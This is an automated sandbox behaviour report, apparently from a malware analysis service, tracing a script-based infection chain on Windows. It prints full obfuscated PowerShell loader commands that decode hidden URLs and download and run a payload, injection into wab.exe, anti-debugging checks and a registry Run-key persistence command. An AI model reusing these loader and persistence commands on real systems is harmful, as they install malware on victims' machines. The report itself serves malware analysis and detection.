          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6040Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3448Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5797Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2919Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2592Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5258Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4230Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep count: 5797 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep count: 2919 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 3060Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6324Thread sleep count: 2592 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 5258 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep count: 4230 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2592 delay: -5Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000003.2216313154.000001F01DDD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: CodeIntegrityInformation
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: CodeIntegrityInformation
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: KernelDebuggerInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30C0000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 309F948Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exeJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs" Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla ,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$cabinetted;++$cabinetted;$cabinetted=$cabinetted-1;function cert69 ($forretningsnavn){$halvmaanedliges=5;$halvmaanedliges++;for($phylloscopine81=5; $phylloscopine81 -lt $forretningsnavn.length-1; $phylloscopine81+=$halvmaanedliges){$foreadapt = 'substring';$slyngblte=$forretningsnavn.$foreadapt.invoke($phylloscopine81, 1);$olfactible=$olfactible+$slyngblte}$olfactible;}$uppishness=cert69 'hypochfavnttdep.ct ekstpel.dys bowl: libe/snebo/mornem indiaburnes doomooverl.armatgpolypeproj./ desiwbeeswp carp- pr.va ygnid panemetaari acrinfarad/klassrt lkue bestccompriresult do sekartorkvi,kesupert havo.brn ervirusa other in e ';$wergilds=$uppishness.split([char]62);$uppishness=$wergilds[0];$batiste=cert69 ' foreijurateak hexmsurk ';$sjusglas = cert69 ' lsni\ cymesnig eyvrtdys rediwnephronuss wp.eud6lymph4 synt\havarwtan aicarponsam rdpol ro dic.wionpasacardpresgso arguw reseeande rindses frath sarceomhyglpledglseric\d plavsrdom1 .ytr.rekur0st,ld\repatpalcoroskarpwunorte,nglerunagisin.erhwifieeblokel flo.leuphe.numeres.irixr,inoeparal ';&($batiste) (cert69 'sterr$skrivsallo e po.ykfe.lmspos.tt uncou di.lr vrkssargen=.onde$ps.cheepit.nbog nvtrla :m.ltew sbefistrrenj,rntd.amilisvrvgrgamet ') ;&($batiste) (cert69 'askeb$ra,gss cab,j o,gousterss hiocglarl.l gasbaassems per,=cinqu$sarcosvaabeelit.ukunm.nsretintcompuuskri,r luttshanhu+fravl$relegs ndejsicyoupropos splagmildelcr ssafrotts s.rv ') ;&($batiste) (cert69 'wayl,$censul langeunme.a llefcimb,wsilkeoblderrandelm ntes fl.e doku=unrep vexed(afmel( imaggtomhjwbagtrmhana.i ev.n kursuwbortviproclnudkrn3uover2n.npa_chinkp dietrjoggiooccupc detoedemenspseudsaxost propa-o.bytflunyi isoenpseriorunhypotranschatcheb,shbsolofss ubveitraved appr=f.rre$under{ethicp.unsti phaedunpud}tvang),isco.teguccantalou derma socmp.digaf rtinmelildukvemlaerosi 